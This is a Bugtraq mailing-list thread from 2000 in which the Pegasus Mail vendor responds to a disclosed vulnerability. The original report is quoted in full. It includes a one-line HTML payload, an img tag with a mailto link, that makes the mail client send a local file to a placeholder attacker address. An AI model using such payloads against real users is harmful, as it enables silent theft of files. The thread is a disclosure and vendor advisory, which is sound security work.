Re: Pegasus mail file reading vulnerability (fwd)

[Richard Stevenson <richard.stevenson () TEAM XTRA CO NZ>]

Hi Aleph1

My apologies for this... I'm not subscribed to Bugtraq at present,
but this is Pegasus Mail Central's response to the threat publicised on
BugTraq recently, so it'll have to go through the moderator.

Regards

Richard



--
Richard Stevenson                       |    Help Microsoft stamp out software
Systems Support Specialist              |    piracy: install Linux today!
richard.stevenson () team xtra co nz       |
Phone +64 9 355 5231                    |    <http://www.linux.org>
Mobile +64 25 2903101                   |



---------- Forwarded message ----------
From: David Harris <David.Harris () pmail gen nz>
To: Imran Ghory <ImranG () BTINTERNET COM>
Date: Wed, 4 Oct 2000 13:54:02 +1300
X-Mailer: Pegasus Mail for Win32 (v4.0, pre-alpha)
Cc: Mark Borrie <mark () gandalf otago ac nz>, Richard.Stevenson () team xtra co nz
Subject: Re: Pegasus mail file reading vulnerability

Mr Ghory has posted an announcement of a potential security hole in
Pegasus Mail, the text for which appears at the end of this message.

Well, I'm the vendor. It's a shame Mr Ghory didn't give us a chance to
prepare for the wave of panic, dismay and inundation of mail that a
posting like this always provokes, but never mind.

Firstly, I'll do the responsible thing and admit that as far as I can tell,
this exploit is feasible. It takes advantage of the fact that Pegasus Mail
has a commandline interface that can be invoked from within a web
browser. Please note that the URL as presented in the report will not
work correctly on the majority of systems - Pegasus Mail requires the
formal RFC1738 syntax for URLs containing spaces. But if properly
represented, it could produce the described effect.

My assessment of the risk involved in this exploit is that it is moderate
at worst. The hacker would need to have exact knowledge of the layout
of the victim's system, and would need to find some way of enticing the
victim to read a page containing the specific link needed to activate the
exploit. Furthermore, even if Pegasus Mail is running, there will almost
always be telltale indications to the user that something has
happened. It is worth stressing that this vulnerability exists only in the
case of links activated from a web browser - Pegasus Mail already
deals with internal mail-based linkages like this.

It is my belief that this exploit may have counterparts in other mail
programs. I suspect that any mail program that has a method for being
invoked from a browser may potentially have a vulnerability along these
lines. I say this not to produce FUD, but in the hope that other
developers will examine their code and satisfy themselves that they are
not at risk from this kind of exploit.

We currently have a replacement component in development which
handles the link between the browser and Pegasus Mail: this
component was developed primarily to deal with other non-security-
related problems, but I will add some code to it to detect links that
send files (something that should never happen in normal use) and
release it publicly as soon as is humanly possible.

I am not subscribed to BugTraq (I probably should be) - so I am asking
my spokesman on the list, Richard Stevenson, to post this reaction to
the list on my behalf (thanks Richard!). I would thank Mr Ghory for
bringing this to our attention, but he hasn't done so yet.

Cheers!

-- David --
Author/Owner, Pegasus Mail System.

------------- Original report follows -------------------------

SUMMARY

The default setup of Pegasus Mail contains a remotely exploitable
security hole that allows a remote website to gain copies of files on the
users hard drive.

DETAILS

Version tested: Pegasus Mail v3.12c with IE5.0

When the webpage containing the exploit code is viewed using IE5,
Pegasus mail will automatically creates a message which has a copy
of the file "c:\test.txt" and is addressed to "hacker () hakersite com" and
queues it ready to be sent without any further user intervention

If instead of "hacker () hakersite com" we have a local user,
"hacker" the message won't be queued but just sent immediately.

Exploit code:

<img src="mailto:hacker () hakersite com -F c:\test.txt">

Temporary Fix:

1) Don't run Pegasus Mail at the same time as a web browser

This is not a complete solution as Pegasus Mail will load up if the
exploit code is run, but this at least will be more noticable to the user.

Vendor:

As I earlier posted a message to vuln-dev giving the basics of this
exploit without the realizing the consequeces (at that stage the user
had to click on a link for the exploit to come into play), I have decided
to publish the full exploit before contacting the vendor.


------------------ David Harris -+- Pegasus Mail ----------------------
  Box 5451, Dunedin, New Zealand | e-mail: David.Harris () pmail gen nz
           Phone: +64 3 453-6880 | Fax: +64 3 453-6612

Thought for the day:
    Book (n): a utensil used to pass time while waiting
    for the TV repairman.